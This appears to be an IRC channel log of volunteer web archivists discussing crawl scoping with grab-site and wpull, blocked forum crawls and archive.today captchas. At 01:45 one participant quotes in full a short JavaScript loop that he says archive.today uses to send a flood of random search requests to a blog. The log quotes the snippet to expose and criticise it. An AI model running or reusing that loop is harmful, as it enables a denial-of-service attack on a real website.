| 00:00:02 | | sec^nd quits [Remote host closed the connection] |
| 00:00:28 | | sec^nd (second) joins |
| 00:02:52 | | Sk1d joins |
| 00:04:46 | | Dada quits [Remote host closed the connection] |
| 00:10:51 | | BornOn420 quits [Ping timeout: 272 seconds] |
| 00:12:47 | | fangfufu quits [Quit: ZNC 1.9.1+deb2+b3 - https://znc.in] |
| 00:13:18 | | fangfufu joins |
| 00:13:23 | | fangfufu is now authenticated as fangfufu |
| 00:14:02 | | sec^nd quits [Remote host closed the connection] |
| 00:14:20 | | sec^nd (second) joins |
| 00:18:17 | | etnguyen03 (etnguyen03) joins |
| 00:42:20 | | hamouda9 quits [Client Quit] |
| 00:49:05 | | Sk1d quits [Read error: Connection reset by peer] |
| 00:49:06 | | etnguyen03 quits [Remote host closed the connection] |
| 00:55:02 | | useretail quits [Remote host closed the connection] |
| 00:55:41 | | etnguyen03 (etnguyen03) joins |
| 00:57:52 | | useretail joins |
| 00:57:57 | | BornOn420 (BornOn420) joins |
| 01:18:05 | <pabs> | klea: re Moin, hackily with AB, or someone could write some code to generate an !ao list https://wiki.archiveteam.org/index.php/MoinMoin#ArchiveBot |
| 01:32:13 | <pabs> | justauser: e164.arpa results https://transfer.archivete.am/8iNc3/e164.arpa-pabs-scrape.txt |
| 01:32:13 | <eggdrop> | inline (for browser viewing): https://transfer.archivete.am/inline/8iNc3/e164.arpa-pabs-scrape.txt |
| 01:35:42 | <klea> | aaa, pita |
| 01:36:12 | <@JAA> | I have a partial implementation of scripts to make it easier, need to finish those. |
| 01:36:16 | <@JAA> | Also, #wikiteam |
| 01:37:48 | <pabs> | justauser: re archive.today, do we know what triggers the captchas? |
| 01:39:41 | <Yakov> | happens everytime when trying to save a capture with no cookies/new session |
| 01:40:32 | <Yakov> | sometimes happens when searching or when going to a capture |
| 01:42:04 | <pabs> | huh, it does now. I remember not having captchas when saving before |
| 01:43:12 | <Yakov> | pretty sure it always did, just if you solved it in the past (whether it be from going to a capture or even viewing a capture previously) it might not show |
| 01:43:44 | <pabs> | hmm |
| 01:45:09 | <Yakov> | anyways they've well aware people know about the DDoS script yet they still keep it, in fact they've mutated the DDoS script since the HN post to now use Math.random instead of Date().getTime() |
| 01:45:41 | <Yakov> | https://news.ycombinator.com/item?id=46624740 <-- previous script, current script: setInterval(function(){fetch("https://gyrovague.com/?s="+Math.random().toString(36).substring(2,3+Math.random()*8),{ referrerPolicy:"no-referrer",mode:"no-cors" });},300);` |
| 01:47:21 | <pokechu22> | hmm, I didn't see the script or any network traffic when I looked for it yesterday; maybe they removed it temporarily? |
| 01:48:54 | <Yakov> | i noticed that too, however i noticed the script still in the html. then i realized ublock and most adblockers now block it as mentioned in the recent gyrovague blog post |
| 01:49:29 | <Yakov> | https://gyrovague.com/2026/02/01/archive-today-is-directing-a-ddos-attack-against-my-blog/ ctrl+f "ublock" |
| 01:50:32 | <pokechu22> | I saw that but assumed it would still show up in the developer console (as blocked). I *think* I also looked in the HTML and didn't see the script, but might have just missed it |
| 01:51:07 | <Yakov> | I always assumed it would be blocked and i'm confused as well however i only glimpsed over it but i know it was definitely there |
| 01:51:13 | <Yakov> | s/always/also/ |
| 01:52:33 | <Yakov> | ublock might not be doing it (just) on a network level? Chromium with 0 extensions and the requests actually do go through and show up |
| 01:55:51 | <Yakov> | https://pastebin.com/X2aW7J1G this is the html for the captcha page for anyone who is curious (only thing i changed was i redacted my IP that was in an html comment from the server) |
| 01:55:53 | <@JAA> | I don't remember *not* seeing a captcha on URL submission (without a recent previous submission). |
| 02:08:02 | <steering> | Yakov: pastebin hid your paste |
| 02:08:05 | <steering> | pastebin-- |
| 02:08:07 | <eggdrop> | [karma] 'pastebin' now has -1 karma! |
| 02:08:24 | <Yakov> | "Pending Moderation" that happened fast |
| 02:08:31 | <steering> | doxx and malware: yes |
| 02:08:33 | <steering> | html dump: no |
| 02:09:07 | <Yakov> | alternative: https://transfer.archivete.am/64GbF/archive.today%20challenge%20html.html |
| 02:09:07 | <eggdrop> | inline (for browser viewing): https://transfer.archivete.am/inline/64GbF/archive.today%20challenge%20html.html |
| 02:10:07 | <Yakov> | wait inline is actually running the html |
| 02:10:16 | <steering> | yeah it does that |
| 02:10:29 | <Yakov> | i was really concerned for a second when i noticed a fake cloudflare challenge |
| 02:10:47 | <Yakov> | lol and it's doin the requests https://img.yakov.cloud/gXuKY.png |
| 02:12:07 | <steering> | yeah i was confused by view source not working |
| 02:12:11 | <steering> | window.history.pushState('/', '', '/'); |
| 02:12:21 | | steering shakes fist at browsers for allowing that to break view source |
| 02:12:37 | <steering> | (or just for allowing it at all, ugh) |
| 02:15:16 | <steering> | https://transfer.archivete.am/inline/bctfb/archive.today.challenge.html uploaded as text/plain |
| 02:15:39 | | steering shakes fist at transfer for not including a newline on the end of the output |
| 02:20:39 | <steering> | aaaaaaah I wish e164 was a thing |
| 02:26:59 | <pabs> | !tell egallager re that wesnoth forums post, there are a few non-404 .sf2 files on IA, found using the little-things ia-cdx-search tool https://transfer.archivete.am/cqUq9/www.freesf2.com-non-404-sf2-files.txt |
| 02:26:59 | <eggdrop> | [tell] ok, I'll tell egallager when they join next |
| 02:28:32 | <Yakov> | i really wish we could recursively archive https://www.mobileread.com/ forums, if someone can figure it out that would be great |
| 02:29:09 | <Yakov> | somehow AB got 403s on forumdisplay.php but works fine in browser? 🤷♂️ |
| 02:35:12 | <pabs> | hmm, wget with no UA doesn't get a 403 |
| 02:37:39 | <Yakov> | it was last done on job id 15ypiav9wiw4v40ktcxoy8dhk |
| 02:38:07 | <Yakov> | 20:58:04 <@pokechu22> https://www.mobileread.com/forums/member.php is restricted, but it also got 403s on forumdisplay.php |
| 02:38:39 | <Yakov> | s/done/queued and aborted/ |
| 02:39:13 | <pabs> | might be IP reputation, I got 200 regardless of UA with curl, using all the AB UAs |
| 02:39:26 | <Yakov> | We can try again then |
| 03:28:41 | | michaelblob quits [Quit: yoop] |
| 03:29:20 | | michaelblob joins |
| 04:02:48 | | etnguyen03 quits [Quit: Konversation terminated!] |
| 04:03:23 | | etnguyen03 (etnguyen03) joins |
| 04:15:54 | | etnguyen03 quits [Remote host closed the connection] |
| 04:19:30 | <pokechu22> | OK, yeah, I can confirm archive.today still does that, and the history modification probably is part of the problem. The way archive.today handles failed jobs is annoying in general - it makes it easy to forget what the original URL was |
| 04:19:47 | <pokechu22> | and it doesn't show up in f12 at all |
| 04:26:42 | | chunkynutz60 quits [Quit: The Lounge - https://thelounge.chat] |
| 04:26:55 | | chunkynutz60 joins |
| 04:45:23 | | Kotomind joins |
| 04:52:58 | | DogsRNice quits [Read error: Connection reset by peer] |
| 04:53:57 | | sec^nd quits [Remote host closed the connection] |
| 04:54:30 | | sec^nd (second) joins |
| 05:03:27 | | SootBector quits [Remote host closed the connection] |
| 05:04:26 | | SootBector (SootBector) joins |
| 05:04:46 | | n9nes quits [Ping timeout: 256 seconds] |
| 05:05:13 | | n9nes joins |
| 05:58:31 | | Island quits [Read error: Connection reset by peer] |
| 06:03:37 | | chunkynutz60 quits [Ping timeout: 272 seconds] |
| 06:09:05 | | nexussfan quits [Quit: Konversation terminated!] |
| 06:22:28 | | ArchivalEfforts quits [Quit: https://quassel-irc.org - Chat comfortably. Anywhere.] |
| 06:23:39 | | ArchivalEfforts joins |
| 06:34:35 | | Sluggs quits [Excess Flood] |
| 06:39:35 | | chunkynutz60 joins |
| 06:39:44 | | Sluggs (Sluggs) joins |
| 06:43:14 | | Guest quits [Read error: Connection reset by peer] |
| 06:43:16 | | Guest joins |
| 06:43:22 | | midou quits [Ping timeout: 256 seconds] |
| 06:50:14 | | barry quits [Remote host closed the connection] |
| 06:50:50 | | barry joins |
| 06:51:32 | | sec^nd quits [Remote host closed the connection] |
| 06:52:02 | | sec^nd (second) joins |
| 07:16:08 | | flotwig quits [Read error: Connection reset by peer] |
| 07:16:21 | | flotwig joins |
| 07:24:04 | | sec^nd quits [Ping timeout: 256 seconds] |
| 07:27:58 | | sec^nd (second) joins |
| 07:36:18 | | Washuu quits [Quit: Ooops, wrong browser tab.] |
| 08:35:09 | | sec^nd quits [Remote host closed the connection] |
| 08:35:35 | | sec^nd (second) joins |
| 09:34:31 | | nathang2184 quits [Ping timeout: 272 seconds] |
| 09:38:49 | | midou joins |
| 09:40:43 | | nathang2184 joins |
| 09:45:21 | | twiswist_ quits [Read error: Connection reset by peer] |
| 09:45:35 | | twiswist_ (twiswist) joins |
| 10:21:15 | | oxtyped quits [Read error: Connection reset by peer] |
| 10:28:20 | | oxtyped joins |
| 10:29:32 | <triplecamera|m> | I've been tinkering with grab-site these days. I'd like to archive <https://pdos.csail.mit.edu/6.828/{2003..2025}/>, which is served by Apache. |
| 10:30:50 | <triplecamera|m> | Apache has a feature: When you access a directory without the index file, Apache lists all files under that directory. This enables the discovery of hidden files (files without links pointing to them). |
| 10:32:17 | <triplecamera|m> | I hope that whenever wpull visits a page, it automatically pushes its parent directory into the queue. Is this possible to achieve? |
| 11:09:08 | | oxtyped quits [Ping timeout: 256 seconds] |
| 11:37:00 | | ichdasich quits [Remote host closed the connection] |
| 11:40:26 | | oxtyped joins |
| 12:00:03 | | Bleo182600722719623455222 quits [Quit: The Lounge - https://thelounge.chat] |
| 12:02:52 | | Bleo182600722719623455222 joins |
| 12:10:53 | | APOLLO03 quits [Quit: .] |
| 12:13:11 | | APOLLO03 joins |
| 12:18:23 | | Washuu joins |
| 12:24:31 | | Dada joins |
| 13:00:23 | | marcmarcos joins |
| 13:09:45 | <justauser> | pabs: I think everything interesting is on our wiki. Always on save, "bad" IPs get it on the first request, lasts for 5 minutes. |
| 13:09:46 | <justauser> | triplecamera|m: grab-site/AB won't climb up the directories on their own; this had to be implemented separately during SFDW project. |
| 13:18:20 | | Arcorann__ quits [Ping timeout: 256 seconds] |
| 13:24:25 | | marcmarcos quits [Ping timeout: 272 seconds] |
| 13:30:32 | <cruller> | You can climb the directories by executing `grab-site --which-wpull-command` and removing `--no-parent` from the output. However, I don't think this is what triplecamera wants to do. |
| 13:32:10 | | PC quits [Remote host closed the connection] |
| 13:32:23 | | PC (PC) joins |
| 13:40:58 | <cruller> | Moreover, with this method, all URLs sharing the same FQDN as the seeds end up within the scope, IIUC. |
| 13:44:54 | <masterx244|m> | i wonder if a ignore could be abused to ignore anything that is not under the /6.828 top level folder |
| 13:45:40 | <cruller> | --hostnames or similar option restricts the scope, but this also affects requisites. |
| 13:48:18 | <masterx244|m> | 5 regexes should be enough to exclude anything outside of the folder. .edu/[^6] .edu/6[^.] .edu/6.[^8] and so on until where the urls divert |
| 13:48:50 | <masterx244|m> | requisites need a run through the database on ignored urls and then a --1 to fetch them without recursion |
| 13:49:10 | <justauser> | grab-site doesn't keep a DB of ignored URLs IIRC. |
| 13:49:32 | <masterx244|m> | it does :P, its inside wpull database |
| 13:50:03 | <masterx244|m> | i absued that back for the imgur hunting, crawl site and have a ignore matching everything except the target domain, afterwards wpull db to urllist and then grep |
| 13:58:23 | | marcmarcos joins |
| 14:01:36 | <marcmarcos> | exit |
| 14:01:44 | | marcmarcos quits [Client Quit] |
| 14:16:59 | | lukash984 quits [Ping timeout: 272 seconds] |
| 14:28:01 | <cruller> | In any case, unless "Index of" pages are linked from regular pages, it's difficult to automatically push them into the queue, right? |
| 14:29:56 | | lukash984 joins |
| 14:30:08 | <justauser> | Not that hard, but needs a custom script. SFDW had one. |
| 14:30:33 | <cruller> | You might be able to do it using “--plugin-script”. But rather than that, I think it's easier to manually create a URL list from a 1st crawl and then perform a 2nd crawl. |
| 14:30:54 | <cruller> | ah yes, custom script. |
| 14:36:24 | <cruller> | BTW, in general, URLs that are in-scope but require out-of-scope resources for discovery are very troublesome. |
| 14:38:57 | | Island joins |
| 14:42:28 | <cruller> | I have no choice but to give up on orphan urls, but it's frustrating to miss urls that could be found depending on crawling rules. |
| 14:48:01 | | oxtyped quits [Ping timeout: 272 seconds] |
| 14:51:11 | | Kotomind quits [Ping timeout: 272 seconds] |
| 14:56:33 | <h2ibot> | Justauser edited Uncyclopedia (+621, Added dump links): https://wiki.archiveteam.org/?diff=60413&oldid=59310 |
| 14:57:58 | | oxtyped joins |
| 14:58:52 | <masterx244|m> | koichi: like said: 2-stage crawl first one to get all folders that are known and then pulling the folder indexes and then processing the indexes to check if there are more URLs hidden |
| 15:00:42 | <jodizzle> | "Washington Post to make ‘significant’ cuts": https://www.semafor.com/article/02/04/2026/washington-post-to-make-significant-cuts |
| 15:01:22 | <jodizzle> | I imagine the Washington Post is thoroughly archived in several places, but just FYI. |
| 15:19:54 | | petrichor quits [Quit: ZNC 1.10.1 - https://znc.in] |
| 15:41:18 | | DogsRNice joins |
| 16:05:38 | <pabs> | pokechu22: re failed archive.today jobs, I found today that in firefox at least that hovering over the tab gives you a truncated original URL and typing that into the URL bar gets you the full URL from history |
| 16:06:50 | | Ryz2 quits [Quit: Ping timeout (120 seconds)] |
| 16:07:01 | | Ryz2 (Ryz) joins |
| 16:07:39 | <pabs> | jodizzle: I think WaPo is pretty hard to archive, ISTR AB gets errors |
| 16:10:39 | | petrichor (petrichor) joins |
| 16:38:15 | | Guest58 quits [Quit: Textual IRC Client: www.textualapp.com] |
| 16:45:57 | | Washuu quits [Quit: Ooops, wrong browser tab.] |
| 17:40:42 | | crullerIRC quits [Ping timeout: 256 seconds] |
| 17:41:56 | | crullerIRC joins |
| 17:46:48 | | cyanbox_ joins |
| 17:47:14 | | cyanbox_ quits [Read error: Connection reset by peer] |
| 17:49:47 | | cyanbox quits [Ping timeout: 272 seconds] |
| 17:57:31 | | Juest quits [Read error: Connection reset by peer] |
| 18:00:56 | | Juest (Juest) joins |
| 18:17:59 | <h2ibot> | Manu edited Distributed recursive crawls (+69, Candidates: Add www.defence.go.ug): https://wiki.archiveteam.org/?diff=60414&oldid=60181 |
| 18:27:08 | | michaelblob quits [Quit: yoop] |
| 18:30:12 | | michaelblob joins |
| 18:32:36 | | Sk1d joins |
| 18:39:44 | | nine quits [Quit: See ya!] |
| 18:39:57 | | nine joins |
| 18:39:57 | | nine is now authenticated as nine |
| 18:39:57 | | nine quits [Changing host] |
| 18:39:57 | | nine (nine) joins |
| 18:43:03 | <h2ibot> | Manu edited Discourse/archived (+89, Queued https://chiahpa.be/): https://wiki.archiveteam.org/?diff=60415&oldid=60387 |
| 18:44:03 | <h2ibot> | Manu edited Discourse/archived (+103, pokechu22 queued discussions.scouting.org): https://wiki.archiveteam.org/?diff=60416&oldid=60415 |
| 18:46:03 | <h2ibot> | Manu edited Discourse/archived (+96, Queued discuss.ipfs.tech): https://wiki.archiveteam.org/?diff=60417&oldid=60416 |
| 18:49:04 | <h2ibot> | Manu edited Discourse/archived (+100, Queued forums.rockylinux.org): https://wiki.archiveteam.org/?diff=60418&oldid=60417 |
| 18:51:04 | <h2ibot> | Manu edited Discourse/archived (+89, Queued ziggit.dev): https://wiki.archiveteam.org/?diff=60419&oldid=60418 |
| 18:53:45 | | Kabaya quits [Ping timeout: 272 seconds] |
| 19:01:59 | | Sk1d quits [Ping timeout: 272 seconds] |
| 19:12:10 | | iPwnedYourIOTSmartdog quits [Quit: Ping timeout (120 seconds)] |
| 19:12:30 | | iPwnedYourIOTSmartdog joins |
| 19:51:21 | | Wohlstand (Wohlstand) joins |
| 19:59:52 | | Wohlstand quits [Client Quit] |
| 20:13:24 | | ThreeHM quits [Quit: WeeChat 4.8.0] |
| 20:14:31 | | ThreeHM (ThreeHeadedMonkey) joins |
| 20:17:40 | | fetcher quits [Ping timeout: 256 seconds] |
| 20:23:06 | | fetcher joins |
| 20:39:41 | | lukash984 quits [Quit: The Lounge - https://thelounge.chat] |
| 20:41:14 | | lukash984 joins |
| 21:35:00 | | Sk1d joins |
| 21:42:13 | | fetcher quits [Ping timeout: 272 seconds] |
| 21:43:38 | | fetcher joins |
| 22:01:22 | | fetcher quits [Ping timeout: 256 seconds] |
| 22:06:42 | | fetcher joins |
| 22:17:32 | | flotwig quits [Quit: ZNC - http://znc.in] |
| 22:19:43 | | flotwig joins |
| 22:21:29 | | fetcher quits [Ping timeout: 272 seconds] |
| 22:23:10 | | fetcher joins |
| 22:30:22 | | Arcorann__ joins |
| 22:38:41 | | flotwig quits [Client Quit] |
| 22:48:43 | | n9nes quits [Ping timeout: 272 seconds] |
| 22:49:50 | | n9nes joins |
| 22:58:02 | | flotwig joins |
| 23:01:51 | | flotwig quits [Client Quit] |
| 23:02:09 | | Dada quits [Remote host closed the connection] |
| 23:08:06 | | flotwig joins |
| 23:11:51 | | flotwig quits [Client Quit] |
| 23:15:34 | | flotwig joins |
| 23:16:32 | | nexussfan (nexussfan) joins |
| 23:38:25 | | Arcorann__ quits [Read error: Connection reset by peer] |
| 23:39:28 | | Arcorann joins |
| 23:49:02 | | Sk1d quits [Ping timeout: 256 seconds] |